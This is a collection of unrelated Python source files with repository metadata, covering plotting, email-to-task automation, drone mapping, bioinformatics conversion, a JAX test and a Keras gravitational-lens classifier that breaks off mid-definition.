ax2.plot(temps, row[0], 'black', label='Temperature (+/- 5 deg C)', marker='8')
ax1.plot(display_pct, row[1], 'blue', label='Precipitation (+/- 50%)', marker='8')
ax1.plot(display_pct, row[2], 'purple', label='Reference Evapotranspiration (+/- 50%)', marker='8')
ax1.plot(display_pct, row[3], 'brown', label='Total Available Water (+/- 50%)', marker='8')
ax3.plot(ndvi, row[4], 'green', linestyle='-.', label='Normalized Density Vegetation\n'
' Index Conversion Factor (0.9 - 1.8)', marker='8')
ax1.plot(display_pct, row[5], 'red', label='Soil Hydraulic Conductivity (+/- 50%)', marker='8')
ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
ax1.set_ylabel(r"Total Recharge in 14-Year Simulation (mm)", fontsize=16)
ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
ax2.xaxis.set_ticks_position("bottom")
ax2.xaxis.set_label_position("bottom")
ax2.spines["bottom"].set_position(("axes", -0.15))
ax2.set_frame_on(True)
ax2.patch.set_visible(False)
for sp in ax2.spines.itervalues():
sp.set_visible(False)
ax2.spines['bottom'].set_visible(True)
ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
ax3.xaxis.set_ticks_position("top")
ax3.xaxis.set_label_position("top")
# ax3.spines["top"].set_position(("axes", 1.0))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
for sp in ax3.spines.itervalues():
sp.set_visible(False)
ax3.spines['top'].set_visible(True)
plt.title('Variation of ETRM Pysical Parameters at {}'.format(str(index).replace('_', ' ')),
y=1.08, fontsize=20)
handle1, label1 = ax1.get_legend_handles_labels()
handle2, label2 = ax2.get_legend_handles_labels()
handle3, label3 = ax3.get_legend_handles_labels()
handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
ax1.legend(handles, labels, loc=0)
if show:
plt.show()
# if fig_path:
# plt.savefig(os.path.join(fig_path, '{}_spider'.format(index)), dpi=600, ext='jpg', close=True,
# verbose=True)
plt.close(fig)
if __name__ == '__main__':
root = os.path.join('F:\\', 'ETRM_Inputs')
sensitivity = os.path.join(root, 'sensitivity_analysis')
pickles = os.path.join(sensitivity, 'pickled')
figure_save_path = os.path.join(sensitivity, 'figures')
make_spider_plot(pickles, NDVI_RANGE, ALL_PCT, TEMPS, figure_save_path, show=True)
# ========================== EOF ==============================================
|
[
"dgketchum@gmail.com"
] |
dgketchum@gmail.com
|
bcb16b3b56244d6ba5fc6daf20ec87ed4180b1ca
|
256afbb25a57bdc54b2c3e3e3fc7832c31c8467f
|
/mutt-to-omnifocus.py
|
224765e49122746dd7328bb35dbb13f24b8b17d3
|
[] |
no_license
|
jeauxlb/mutt-to-omnifocus
|
a3b3ba29ff83220c1ce5f52ba351d44e6bad3ac7
|
5d19b109057eeaad1c600c4e0d5dccc952a03546
|
refs/heads/master
| 2021-01-19T08:26:52.169184
| 2019-11-03T13:02:26
| 2019-11-03T13:02:26
| 87,630,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,832
|
py
|
#!/usr/bin/env python
import sys
import os
import getopt
import email.parser
import subprocess
from email.header import decode_header
def usage():
print """
Take an RFC-compliant e-mail message on STDIN and add a
corresponding task to the OmniFocus inbox for it.
Options:
-h, --help
Display this help text.
-q, --quick-entry
Use the quick entry panel instead of directly creating a task.
"""
def applescript_escape(string):
"""Applescript requires backslashes and double quotes to be escaped in
string. This returns the escaped string.
"""
if string is not None:
# Backslashes first (else you end up escaping your escapes)
string = string.replace('\\', '\\\\')
# Then double quotes
string = string.replace('"', '\\"')
return string
def parse_message(raw):
"""Parse a string containing an e-mail and produce a list containing the
significant headers. Each element is a tuple containing the name and
content of the header (list of tuples rather than dictionary to preserve
order).
"""
# Create a Message object
message = email.parser.Parser().parsestr(raw, headersonly=True)
# Extract relevant headers
list = [("Date", message.get("Date")),
("From", message.get("From")),
# ("Subject", message.get("Subject")),
("Message-ID", message.get("Message-ID"))]
try:
sub, encoding = decode_header(message.get("Subject"))[0]
sub = sub.replace('\n', '');
pipe = subprocess.Popen(['/Users/joel/bin/item_name.sh', sub], stdout=subprocess.PIPE)
subject, error = pipe.communicate()
list.append(["Subject", subject.rstrip('\n')])
except KeyboardInterrupt:
print ""
sys.exit()
return list
def send_to_omnifocus(params, quickentry=False):
"""Take the list of significant headers and create an OmniFocus inbox item
from these.
"""
# name and note of the task (escaped as per applescript_escape())
name = "%s" % applescript_escape(dict(params)["Subject"])
note = "\n".join(["%s: %s" % (k, applescript_escape(v)) for (k, v) in params])
# Write the Applescript
if quickentry:
applescript = """
tell application "OmniFocus"
tell default document
tell quick entry
open
make new inbox task with properties {name: "%s", note:"%s"}
select tree 1
set note expanded of tree 1 to true
end tell
end tell
end tell
""" % (name, note)
else:
applescript = """
tell application "OmniFocus"
tell default document
make new inbox task with properties {name: "%s", note:"%s"}
end tell
end tell
""" % (name, note)
# Use osascript and a heredoc to run this Applescript
os.system("\n".join(["osascript >/dev/null << EOT", applescript, "EOT"]))
def main():
# Check for options
try:
opts, args = getopt.getopt(sys.argv[1:], "hq", ["help", "quick-entry"])
except getopt.GetoptError:
usage()
sys.exit(-1)
# If an option was specified, do the right thing
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit(0)
elif opt in ("-q", "--quick-entry"):
raw = sys.stdin.read()
send_to_omnifocus(parse_message(raw), quickentry=True)
sys.exit(0)
# Otherwise fall back to standard operation
raw = sys.stdin.read()
send_to_omnifocus(parse_message(raw), quickentry=False)
sys.exit(0)
if __name__ == "__main__":
main()
|
[
"github@spam.joelbuckley.com.au"
] |
github@spam.joelbuckley.com.au
|
b5dd9c0170e9576edc3884cda967bd39951aad8f
|
13fa6b903547618d567c3284b9dc637024800947
|
/Código-fonte/navigation/SLAM/map_view.py
|
0d40fc571f4a21cc1956f3e290760dd3e68519b6
|
[] |
no_license
|
EvoSystems-com-br/IniciacaoCientifica2018_ProjetoDrones
|
cc5a8a91dbc007cad85000a31465ed3950980bd1
|
8af0ca6930b326ae7bc0cd7bb9aa2d6aa62bceeb
|
refs/heads/master
| 2020-03-26T11:49:31.933492
| 2018-10-30T19:41:16
| 2018-10-30T19:41:16
| 144,861,611
| 0
| 3
| null | 2018-10-30T19:41:19
| 2018-08-15T14:11:58
|
Python
|
UTF-8
|
Python
| false
| false
| 2,335
|
py
|
import cv2
import time
import math
import numpy as np
PIXEL_RATE = 1.75
OFFSET_X = 60
OFFSET_Y = 50
RANGE_Y = 150
CIRCLE_RADIO = 15
MARKER_SIZE = 20
class MapView():
def __init__(self):
self.esquema = cv2.imread("data/esquema.png")
self.esquema = cv2.resize(self.esquema, (480, 360))
self.drone = cv2.imread("data/drone.png")
self.drone = cv2.resize(self.drone, (48, 36))
self.updateMap([[50], [0],[180]])
def updateMap(self, X):
self.map = self.esquema.copy()
self.drawDrone(X[0][0], X[1][0], X[2][0])
n_marker = int((len(X)/3) - 1)
for i in range(n_marker):
x1 = X[3+3*i][0]
y1 = X[4+3*i][0]
beta = X[5+3*i][0] *3.14/180
x2 = x1 - MARKER_SIZE*math.sin(beta)
y2 = y1 + MARKER_SIZE*math.cos(beta)
#Transforma coordenada em cm para coordenada em pixel
coord_x1 = int(OFFSET_X + x1*PIXEL_RATE)
coord_y1 = int(OFFSET_Y + (RANGE_Y-y1)*PIXEL_RATE)
coord_x2 = int(OFFSET_X + x2*PIXEL_RATE)
coord_y2 = int(OFFSET_Y + (RANGE_Y-y2)*PIXEL_RATE)
self.map = cv2.line(self.map, (coord_x1, coord_y1),
(coord_x2, coord_y2), (19, 69,139), 5)
def drawDrone(self, x, y, alpha):
#Transforma coordenada em cm para coordenada em pixel
coord_x = int(OFFSET_X + x*PIXEL_RATE)
coord_y = int(OFFSET_Y + (RANGE_Y-y)*PIXEL_RATE)
cv2.circle(self.map, (coord_x, coord_y), CIRCLE_RADIO, (255, 0, 0), -1)
#desenha a orientação do drone
p1_x = coord_x + CIRCLE_RADIO*math.cos((alpha+30)*3.14/180)
p1_y = coord_y - CIRCLE_RADIO*math.sin((alpha+30)*3.14/180)
p2_x = coord_x + CIRCLE_RADIO*math.cos((alpha-30)*3.14/180)
p2_y = coord_y - CIRCLE_RADIO*math.sin((alpha-30)*3.14/180)
p3_x = coord_x + 2*CIRCLE_RADIO*math.cos((alpha)*3.14/180)
p3_y = coord_y - 2*CIRCLE_RADIO*math.sin((alpha)*3.14/180)
pts = np.array([[p1_x, p1_y],[p2_x,p2_y],[p3_x,p3_y]], np.int32)
pts = pts.reshape((-1,1,2))
cv2.fillPoly(self.map,[pts],(255,0,0))
def showMap(self):
while(True):
cv2.imshow("mapa", self.map)
if cv2.waitKey(100) & 0xFF == ord('q'):
break
|
[
"leonardotkimura@gmail.com"
] |
leonardotkimura@gmail.com
|
4278e7b7f4ccb1865e1fc8e2c19350fb3bfb8177
|
2556d0bed5e90489ec8c93ad033db00b235e3de0
|
/main.py
|
e5979e99101b749dfa72a25e15f20ec0069e877e
|
[] |
no_license
|
weichih654/movie_review
|
dd08392d029c3d7614178e5c49e97b6c973f659b
|
47fabf41262318568bd7dbcafb34e0acb531b674
|
refs/heads/master
| 2021-01-10T02:14:22.864684
| 2016-03-21T11:01:23
| 2016-03-21T11:01:23
| 49,113,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
from libs.movie_review import MovieReview
from libs.review_searcher import ReviewSeacher
from libs.matcher import Matcher
if __name__ == "__main__":
searcher = ReviewSeacher("test")
reviews = []
reviews = searcher.reviews
for r in reviews:
review = MovieReview(r)
print "link = " + r
print "content = " + review.content
|
[
"weichih654@gmail.com"
] |
weichih654@gmail.com
|
42d0987e6e1898a0e5f60a297e7db42a013fab6d
|
bcf332d2f6ef6970cfaa480400a112ecee3f16b8
|
/stage07-artist2/s1level42.py
|
c5f34c2ae0814db387a0d43027c8ee7cd714f9b1
|
[
"Unlicense"
] |
permissive
|
skilstak/code-dot-org-python
|
e1907d29f3727060e5064a5eefd68a0f9f4f5c70
|
ba127124386ecfdc20bd84592b3c271f8205d748
|
refs/heads/master
| 2020-04-04T19:34:23.531210
| 2015-07-10T12:39:19
| 2015-07-10T12:39:19
| 26,862,410
| 7
| 4
| null | 2014-11-21T20:28:20
| 2014-11-19T13:24:30
|
Python
|
UTF-8
|
Python
| false
| false
| 465
|
py
|
"""Stage 7: Puzzle 8 of 11
Here's the solution to the previous puzzle. Can you add just 2 more
lines of code to complete the drawing?
"""
import sys
sys.path.append('..')
import codestudio
artist = codestudio.load('s1level42')
artist.speed = 'faster'
a = artist
for count2 in range(10):
artist.color = artist.random_color()
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
|
[
"rob@skilstak.com"
] |
rob@skilstak.com
|
d022c401cac71d8aef3ec744f424139b4bfc884d
|
88ca4006c4d624320002c3f939f27e2ba3a59a5a
|
/ch6_queue.py
|
53936cf17d2c92ec70739941c09ef32b7b45e402
|
[] |
no_license
|
sunice/PythonPractice
|
28dcf2bb5666f19e538c31783063f65b830ba7c3
|
64a4feb354fd84f64e193a8c5e62364fb50541bc
|
refs/heads/master
| 2016-09-06T12:50:51.491985
| 2015-05-25T00:49:51
| 2015-05-25T00:49:51
| 35,148,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 712
|
py
|
queue = []
def enQ():
queue.append(raw_input(' Enter New string: ').strip())
def deQ():
if len(queue) == 0:
print 'Cannot pop from an empty queue!'
else:
print 'Removed [', `queue.pop(0)`, ']'
def viewQ():
print queue
CMDs = {'e': enQ, 'd': deQ, 'v': viewQ}
def showmenu():
pr = """
(E)nqueue
(D)equeue
(V)iew
(Q)uit
Enter choice: """
while True:
while True:
try:
choice = raw_input(pr).strip()[0].lower()
except (EOFError, KeyboardInterrupt, IndexError):
choice = 'q'
print '\nYou picked: [%s]' % choice
if choice not in 'devq':
print 'Invalid option, try again'
else:
break
if choice == 'q':
break
CMDs[choice]()
if __name__ == '__main__':
showmenu()
|
[
"izhang@microstrategy.com"
] |
izhang@microstrategy.com
|
6ab95716a6bff065c2b13765723aee7964f0a87a
|
ef25f5fe6b74e2c84dd299de2e23c3487f9b0746
|
/python_exc/gff_to_gtf.py
|
8b9f067f870b1ab50db3376e17259da74df17ba1
|
[] |
no_license
|
feifei/python
|
32da1cb18ce19a05a62fc334ba4aab902b2cd0af
|
f0eaa69d5ca011e3075f9af56ef3aa756178e5e3
|
refs/heads/main
| 2023-05-30T19:14:06.132356
| 2021-06-04T13:45:03
| 2021-06-04T13:45:03
| 342,535,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,515
|
py
|
#!/usr/bin/env python
''' Convert GFF3 file to GTF,
only tested on EupathDB output, which is not a standard GFF3 file
'''
import os, re
import argparse
parser = argparse.ArgumentParser(description='Convert gff3 file to gtf file')
parser.add_argument('gff_file')
args = parser.parse_args()
gff_file = args.gff_file
basename, extension = os.path.splitext(gff_file)
gtf_file = basename + ".gtf"
with open (gff_file, 'r') as inh, open(gtf_file, 'w') as outh:
for line in inh:
if line.startswith("#"):
continue
scfid, source, feature, start, end, score, strand, frame, attr = line.split("\t")
if feature == "gene":
gene_id = re.match("ID=(.*?);", attr).group(1)
new_attr = "gene_id \"%s\";" %gene_id
transcript_id = gene_id + "_t"
elif feature == "exon":
exon_id = re.match("ID=(.*?);", attr).group(1)
exon_number = re.search("-(\d+)$", exon_id).group(1)
new_attr = "gene_id \"%s\"; transcript_id \"%s\"; exon_number \"%s\"; exon_id \"%s\";" %(gene_id, transcript_id, exon_number, exon_id)
else:
continue
print >>outh, "\t".join([scfid, source, feature, start, end, score, strand, frame, new_attr])
if feature == "gene":
new_attr = "gene_id \"%s\"; transcript_id \"%s\";" %(gene_id, transcript_id)
print >>outh, "\t".join([scfid, source, "transcript", start, end, score, strand, frame, new_attr])
|
[
"feifei.xu@ebc.uu.se"
] |
feifei.xu@ebc.uu.se
|
9592e0575d2287aeb96b002e0a67d11474e08684
|
b83e9ded5aa46bf7c79a6cbce8a239a4ca0b38ba
|
/tests/utils_test.py
|
d4794967907dc4fe9f079e14a39ef5e15d4c4884
|
[
"Apache-2.0"
] |
permissive
|
pnickl/neural-tangents
|
55cb2800dc8067fff5024e995fbe953070f41905
|
79a47a60b5dd00d03c5ae5f9edb44ca66463fc1c
|
refs/heads/master
| 2022-12-27T03:48:29.453417
| 2020-09-30T17:21:22
| 2020-10-01T00:44:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,958
|
py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/predict.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.api import device_get
from jax.api import jit
from jax.config import config
from jax.lib import xla_bridge
import jax.numpy as np
import jax.random as random
from neural_tangents.utils import utils
config.parse_flags_with_absl()
config.update('jax_numpy_rank_promotion', 'raise')
class UtilsTest(jtu.JaxTestCase):
def testIsOnCPU(self):
for dtype in [np.float32, np.float64]:
with self.subTest(dtype=dtype):
def x():
return random.normal(random.PRNGKey(1), (2, 3), dtype)
def x_cpu():
return device_get(random.normal(random.PRNGKey(1), (2, 3), dtype))
x_jit = jit(x)
# x_cpu_jit = jit(x_cpu)
x_cpu_jit_cpu = jit(x_cpu, backend='cpu')
self.assertTrue(utils.is_on_cpu(x_cpu()))
# TODO(mattjj): re-enable this when device_put under jit works
# self.assertTrue(utils.is_on_cpu(x_cpu_jit()))
self.assertTrue(utils.is_on_cpu(x_cpu_jit_cpu()))
if xla_bridge.get_backend().platform == 'cpu':
self.assertTrue(utils.is_on_cpu(x()))
self.assertTrue(utils.is_on_cpu(x_jit()))
else:
self.assertFalse(utils.is_on_cpu(x()))
self.assertFalse(utils.is_on_cpu(x_jit()))
if __name__ == '__main__':
absltest.main()
|
[
"romann@google.com"
] |
romann@google.com
|
e3f0fa8530d803d47671f975bfbbc686baaee7bb
|
73be09853a2a303597825a5fe765610eeebbc5ef
|
/ForGPU/KerasCnn5.py
|
f6163ee71736ad8085652a59616dc5a78c1d025c
|
[
"MIT"
] |
permissive
|
Annarien/GravitationalLenses
|
7375cded8a028f39b4426687f90b5d0f8ca92cde
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
refs/heads/main
| 2023-06-02T21:25:29.543234
| 2021-06-19T18:20:07
| 2021-06-19T18:20:07
| 341,883,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 55,630
|
py
|
"""
This is file performs the convolutional neural network algorithm, in which the k fold is performed as well.
The results were saved in a csv file.
"""
import os
import sys
import random
from datetime import datetime
import numpy as np
import tensorflow
from astropy.io import fits
from astropy.utils.data import get_pkg_data_filename
from matplotlib import pyplot as plt
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.utils import shuffle
from tensorflow.python.keras import Sequential
from tensorflow.python.keras.callbacks import ModelCheckpoint, EarlyStopping
from tensorflow.python.keras.layers.convolutional import Conv2D, MaxPooling2D
from tensorflow.python.keras.layers.core import Dense, Dropout, Flatten
from tensorflow.python.keras.models import Model
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.utils.vis_utils import plot_model
from tensorflow.python.keras.models import save_model
# added Adam opt for learning rate
from tensorflow.python.keras.optimizers import Adam
# from tensorflow.keras.optimizers import Adam
from tensorflow.python.keras import backend as K
from ExcelUtils import createExcelSheet, writeToFile
print(tensorflow.__version__)
now = datetime.now()
dt_string = now.strftime("%d_%m_%Y_%H_%M_%S")
print(dt_string)
excel_headers = []
excel_dictionary = []
excel_headers.append("Date and Time")
excel_dictionary.append(dt_string)
# Globals
makeNewCSVFile = True
max_num = sys.maxsize # Set to sys.maxsize when running entire data set
max_num_testing = sys.maxsize # Set to sys.maxsize when running entire data set
max_num_prediction = sys.maxsize # Set to sys.maxsize when running entire data set
validation_split = 0.2 # A float value between 0 and 1 that determines what percentage of the training
# data is used for validation.
k_fold_num = 5 # A number between 2 and 10 that determines how many times the k-fold classifier
# is trained.
epochs = 50 # A number that dictates how many iterations should be run to train the classifier
batch_size = 128 # The number of items batched together during training.
run_k_fold_validation = True # Set this to True if you want to run K-Fold validation as well.
input_shape = (100, 100, 3) # The shape of the images being learned & evaluated.
augmented_multiple = 2 # This uses data augmentation to generate x-many times as much data as there is on file.
use_augmented_data = True # Determines whether to use data augmentation or not.
patience_num = 5 # Used in the early stopping to determine how quick/slow to react.
use_early_stopping = True # Determines whether to use early stopping or not.
use_model_checkpoint = True # Determines whether the classifiers keeps track of the most accurate iteration of itself.
monitor_early_stopping = 'val_loss'
monitor_model_checkpoint = 'val_acc'
use_shuffle = True
learning_rate = 0.001
training_positive_path = 'Training/PositiveAll'
# training_positive_path = 'UnseenData/KnownLenses_training'
training_negative_path = 'Training/Negative'
testing_positive_path = 'Testing/PositiveAll'
testing_negative_path = 'Testing/Negative'
# unseen_known_file_path = 'UnseenData/Known131'
unseen_known_file_path_select = 'UnseenData/SelectingSimilarLensesToPositiveSimulated'
unseen_known_file_path_all = 'UnseenData/KnownLenses'
# Adding global parameters to excel
excel_headers.append("Max Training Num")
excel_dictionary.append(max_num)
excel_headers.append("Max Testing Num")
excel_dictionary.append(max_num_testing)
excel_headers.append("Max Prediction Num")
excel_dictionary.append(max_num_prediction)
excel_headers.append("Validation Split")
excel_dictionary.append(validation_split)
excel_headers.append("K fold Num")
excel_dictionary.append(k_fold_num)
excel_headers.append("Epochs")
excel_dictionary.append(epochs)
excel_headers.append("Batch Size")
excel_dictionary.append(batch_size)
excel_headers.append("Run K fold")
excel_dictionary.append(run_k_fold_validation)
excel_headers.append("Input Shape")
excel_dictionary.append(input_shape)
excel_headers.append("Augmented Multiple")
excel_dictionary.append(augmented_multiple)
excel_headers.append("Use Augmented Data")
excel_dictionary.append(use_augmented_data)
excel_headers.append("Patience")
excel_dictionary.append(patience_num)
excel_headers.append("Use Early Stopping")
excel_dictionary.append(use_early_stopping)
excel_headers.append("Use Model Checkpoint")
excel_dictionary.append(use_model_checkpoint)
excel_headers.append("Monitor Early Stopping")
excel_dictionary.append(monitor_early_stopping)
excel_headers.append("Monitor Model Checkpoint")
excel_dictionary.append(monitor_model_checkpoint)
excel_headers.append("Use Shuffle")
excel_dictionary.append(use_shuffle)
excel_headers.append("Learning Rate")
excel_dictionary.append(learning_rate)
if not os.path.exists('../Results/%s/' % dt_string):
os.mkdir('../Results/%s/' % dt_string)
# Helper methods
def getPositiveImages(images_dir, max_num, input_shape):
"""
This gets the positively simulated images in the g, r and i bands.
Args:
images_dir(string): This is the file path address of the positively simulated images.
max_num(integer): This is the number of sources of the positively simulated images to be used.
input_shape(tuple): This is the shape of the images.
Returns:
positive_images(numpy array): This is the numpy array of the positively simulated images with the shape of
(num of images, input_shape[0], input_shape[1], input_shape[2]) =
(num_of_images, 100, 100, 3).
"""
global g_img_path, r_img_path, i_img_path
for root, dirs, _ in os.walk(images_dir):
num_of_images = min(max_num, len(dirs))
positive_images = np.zeros([num_of_images, 3, 100, 100])
index = 0
print('image_dir: ' + str(images_dir))
for folder in dirs:
if images_dir == 'Training/PositiveAll':
g_img_path = get_pkg_data_filename('%s/%s_g_norm.fits' % (os.path.join(root, folder), folder))
r_img_path = get_pkg_data_filename('%s/%s_r_norm.fits' % (os.path.join(root, folder), folder))
i_img_path = get_pkg_data_filename('%s/%s_i_norm.fits' % (os.path.join(root, folder), folder))
elif images_dir == 'UnseenData/KnownLenses_training':
g_img_path = get_pkg_data_filename('%s/g_norm.fits' % (os.path.join(root, folder)))
r_img_path = get_pkg_data_filename('%s/r_norm.fits' % (os.path.join(root, folder)))
i_img_path = get_pkg_data_filename('%s/i_norm.fits' % (os.path.join(root, folder)))
# print('g_img_path: ' + str(g_img_path))
# print('r_img_path: ' + str(r_img_path))
# print('i_img_path: ' + str(i_img_path))
g_data = fits.open(g_img_path)[0].data[0:100, 0:100]
r_data = fits.open(r_img_path)[0].data[0:100, 0:100]
i_data = fits.open(i_img_path)[0].data[0:100, 0:100]
img_data = [g_data, r_data, i_data]
positive_images[index] = img_data
index += 1
if index >= num_of_images:
break
return positive_images.reshape(num_of_images, input_shape[0], input_shape[1], input_shape[2])
def getNegativeImages(images_dir, max_num, input_shape):
"""
This gets the negative images in the g, r and i bands.
Args:
images_dir(string): This is the file path address of the negative images.
max_num(integer): This is the number of sources of the negative images to be used.
input_shape(tuple): This is the shape of the images.
Returns:
negative_images(numpy array): This is the numpy array of the negative images with the shape of
(num of images, input_shape[0], input_shape[1], input_shape[2]) =
(num_of_images, 100, 100, 3).
"""
for root, dirs, _ in os.walk(images_dir):
num_of_images = min(max_num, len(dirs))
negative_images = np.zeros([num_of_images, 3, 100, 100])
index = 0
for folder in dirs:
g_img_path = get_pkg_data_filename('%s/g_norm.fits' % (os.path.join(root, folder)))
r_img_path = get_pkg_data_filename('%s/r_norm.fits' % (os.path.join(root, folder)))
i_img_path = get_pkg_data_filename('%s/i_norm.fits' % (os.path.join(root, folder)))
g_data = fits.open(g_img_path)[0].data[0:100, 0:100]
r_data = fits.open(r_img_path)[0].data[0:100, 0:100]
i_data = fits.open(i_img_path)[0].data[0:100, 0:100]
img_data = [g_data, r_data, i_data]
negative_images[index] = img_data
index += 1
if index >= num_of_images:
break
return negative_images.reshape(num_of_images, input_shape[0], input_shape[1], input_shape[2])
def getUnseenData(images_dir, max_num, input_shape):
"""
This gets the unseen images in the g, r and i bands containing the identified known lenses.
Args:
images_dir(string): This is the file path address of the unseen images.
max_num(integer): This is the number of sources of the unseen images to be used.
input_shape(tuple): This is the shape of the images.
Returns:
des_tiles(dictionary): This is the dictionary of the unseen images with the shape of
(num of images, input_shape[0], input_shape[1], input_shape[2]) =
(num_of_images, 100, 100, 3).
"""
des_tiles = {}
for root, dirs, _ in os.walk(images_dir):
num_of_images = min(max_num, len(dirs))
index = 0
for folder in dirs:
g_img_path = get_pkg_data_filename('%s/g_norm.fits' % (os.path.join(root, folder)))
r_img_path = get_pkg_data_filename('%s/r_norm.fits' % (os.path.join(root, folder)))
i_img_path = get_pkg_data_filename('%s/i_norm.fits' % (os.path.join(root, folder)))
# print(g_img_path)
g_data = fits.open(g_img_path)[0].data[0:100, 0:100]
# print(np.shape(g_data))
r_data = fits.open(r_img_path)[0].data[0:100, 0:100]
i_data = fits.open(i_img_path)[0].data[0:100, 0:100]
img_data = np.array([g_data, r_data, i_data]).reshape(input_shape[0], input_shape[1], input_shape[2])
des_tiles.update({folder: img_data})
index += 1
if index >= num_of_images:
break
return des_tiles
def makeImageSet(positive_images, negative_images=None, tile_names=None, shuffle_needed=use_shuffle):
"""
This is used to create data set of images and labels, in which the positive and negative images are all
combined and shuffled.
Args:
positive_images(numpy array): This is the numpy array of the positively simulated images.
negative_images(numpy array): This is the numpy array of the negative images, this is set to a
default of None.
tile_names(list): This is the dictionary of the unseen known lenses, this is set to a
default of None.
shuffle_needed(boolean): This is a boolean value to determine whether or not shuffling of the given data
sets is required.
Returns:
image_set(numpy array): This is the image data set of numpy array of the combination positive
and negative images.
label_set(numpy array): This is the label data set of numpy array of the combination positive
and negative label.
des_names_set(numpy array): This is the des name data set of the known lenses and negative images used.
"""
image_set = []
label_set = []
tile_name_set = []
if positive_images is not None:
for index in range(0, len(positive_images)):
image_set.append(positive_images[index])
label_set.append(1)
if tile_names is not None:
tile_name_set.append(tile_names[index])
if negative_images is not None:
for index in range(0, len(negative_images)):
image_set.append(negative_images[index])
label_set.append(0)
if tile_names is not None:
tile_name_set.append(tile_names[index])
# print("Label Set: " + str(label_set))
if shuffle_needed:
if tile_names is not None:
image_set, label_set, tile_name_set = shuffle(image_set, label_set, tile_name_set)
else:
image_set, label_set = shuffle(image_set, label_set)
# print("Shuffled Label Set: " + str(label_set))
return np.array(image_set), np.array(label_set), np.array(tile_name_set)
def buildClassifier(input_shape=(100, 100, 3)):
"""
This creates the CNN algorithm.
Args:
input_shape(tuple): This is the image shape of (100,100,3)
Returns:
classifier(sequential): This is the sequential model.
"""
# Initialising the CNN
opt = Adam(lr=learning_rate) # lr = learning rate
# classifier = Sequential()
# classifier.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape, padding='same'))
# classifier.add(MaxPooling2D(pool_size=(4, 4), padding='same'))
# classifier.add(Conv2D(32, (3, 3), activation='relu', padding='same'))
# classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
# classifier.add(Conv2D(64, (3, 3), padding='same', activation='relu'))
# classifier.add(Conv2D(64, (3, 3), activation='relu', padding='same'))
# classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
# classifier.add(Dropout(0.2)) # antes era 0.25
# classifier.add(Conv2D(64, (3, 3), padding='same', activation='relu'))
# classifier.add(Conv2D(64, (3, 3), activation='relu', padding='same'))
# classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
# classifier.add(Dropout(0.2))# antes era 0.25
# classifier.add(Flatten())
# # classifier.add(Dense(units=512, activation='relu'))
# classifier.add(Dropout(0.2))
# classifier.add(Dense(units=1, activation='sigmoid'))
# classifier.summary()
#
# # Compiling the CNN
# classifier.compile(optimizer=opt,loss = 'binary_crossentropy',metrics = ['accuracy'])
# classifier.add(Conv2D(96, kernel_size=(2, 2), activation='relu', input_shape=input_shape)) # padding='same'
# classifier.add(MaxPooling2D(pool_size=(2, 2))) # padding='same'
# classifier.add(Dropout(0.2))
# classifier.add(Conv2D(128, (2, 2), activation='relu')) # padding='same'
# classifier.add(MaxPooling2D(pool_size=(2, 2))) # padding='same'
# classifier.add(Dropout(0.2))
# classifier.add(Conv2D(256, (2, 2), activation='relu')) # padding='same'
# classifier.add(MaxPooling2D(pool_size=(2, 2)))
# classifier.add(Dropout(0.2))
# classifier.add(Conv2D(256, (2, 2), activation='relu')) # padding='same'
# classifier.add(Dropout(0.2))
# classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same')) # padding='same'
# classifier.add(Dropout(0.2))
# classifier.add(Flatten())
# classifier.add(Dense(units=2048, activation='relu')) # added new dense layer
# classifier.add(Dense(units=1024, activation='relu')) # added new dense layer
# classifier.add(Dropout(0.2))
# classifier.add(Dense(units=1024, activation='relu')) # added new dense layer
# classifier.add(Dropout(0.2))
# classifier.add(Dense(units=1, activation='sigmoid'))
# classifier.summary()
#
# # Compiling the CNN
# classifier.compile(optimizer=opt,
# loss='binary_crossentropy',
# metrics=['accuracy'])
classifier = Sequential()
classifier.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape, padding='same'))
classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
classifier.add(Dropout(0.5)) # added extra Dropout layer
classifier.add(Conv2D(64, (3, 3), activation='relu', padding='same'))
classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
classifier.add(Conv2D(128, (3, 3), padding='same', activation='relu'))
classifier.add(Dropout(0.5)) # added extra dropout layer
classifier.add(Conv2D(256, (3, 3), activation='relu', padding='same'))
classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
classifier.add(Dropout(0.2)) # antes era 0.25
# Adding a third convolutional layer
classifier.add(Conv2D(512, (3, 3), padding='same', activation='relu'))
classifier.add(MaxPooling2D(2,2))
classifier.add(Conv2D(1024, (3, 3), activation='relu', padding='same'))
classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
